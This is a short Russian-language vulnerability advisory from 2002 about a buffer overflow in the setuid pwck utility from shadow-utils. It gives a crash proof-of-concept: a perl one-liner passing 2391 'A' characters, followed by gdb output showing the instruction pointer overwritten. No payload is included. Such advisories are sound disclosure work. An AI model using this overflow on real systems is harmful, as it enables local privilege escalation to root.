Переполнение буфера в pwck (Эксплоит)

Дата публикации:
10.09.2002
Всего просмотров:
822
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Утилита pwck проверяет целостность системной опознавательной информации. Проверяются все записи в /etc/passwd и /etc/shadow на достоверность. Обнаруженная уязвимость позволяет местному атакующему заставить программу выполнять произвольный код, потенциально получая поднятые привилегии в системах, в которых pwck установлен как setuid root. Пример:
 
[CiLeK@karadenizeregli Taci]# /usr/sbin/pwck `perl -e '{print"A"x2391}'` 
Segmentation fault (core dumped)

[CiLeK@karadenizeregli Taci]# gdb /usr/sbin/pwck core
GNU gdb 5.1.1
This GDB was configured as "i386-mandrake-linux"...
Core was generated by `/usr/sbin/pwck 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0  0x00414141 in ?? ()
(gdb) info reg
eax            0x1      1
ecx            0x4eff4040       1325350976
edx            0x0      0
ebx            0x41414141       1094795585
esp            0xbfffe454       0xbfffe454
ebp            0x0      0x0
esi            0xbfffeec4       -1073746236
edi            0x804cd80        134532480
eip            0x414141 0x414141
eflags         0x10286  66182
уязвимость обнаружена в shadow-utils-20000826-4

Ссылки: Exploit code:
или введите имя

CAPTCHA